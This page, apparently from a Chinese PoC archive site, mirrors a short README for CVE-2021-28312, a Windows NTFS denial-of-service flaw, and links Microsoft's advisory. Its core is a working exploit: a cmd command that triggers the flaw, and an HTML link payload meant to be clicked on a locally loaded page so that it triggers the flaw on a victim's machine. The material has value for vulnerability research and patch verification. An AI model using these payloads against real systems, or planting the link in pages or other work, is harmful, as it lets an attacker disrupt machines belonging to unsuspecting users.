支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: 267f393df1b03a8a82a93a6c59fb859de11778a0

来源
关联漏洞
标题:Microsoft Windows NTFS 输入验证错误漏洞 (CVE-2021-28312)
Description:Microsoft Windows NTFS是美国微软(Microsoft)公司的一个为计算机文件服务的文件系统。该文件系统具有错误预警功能、磁盘自我修复功能和日志功能。 Windows NTFS 存在安全漏洞,该漏洞源于拒绝服务。
Description
POC and description for CVE-2021-28312
介绍
# CVE-2021-28312
POC and description for CVE-2021-28312
### Windows NTFS Denial of Service Vulnerability
Link: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28312
### Reproduction 
From cmd: type following command `cd c:\:$i30:$bitmap` <br/>
Remote exploitation possibility: Can be done by adding following link on locally loaded page
```
<a href="file:\\c:\:$i30:$bitmap">Click here</a>
```
---
Details about $i30 attribute: https://www.sans.org/blog/ntfs-i30-index-attributes-evidence-of-deleted-and-overwritten-files/
文件快照

[4.0K] /data/pocs/267f393df1b03a8a82a93a6c59fb859de11778a0 └── [ 544] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。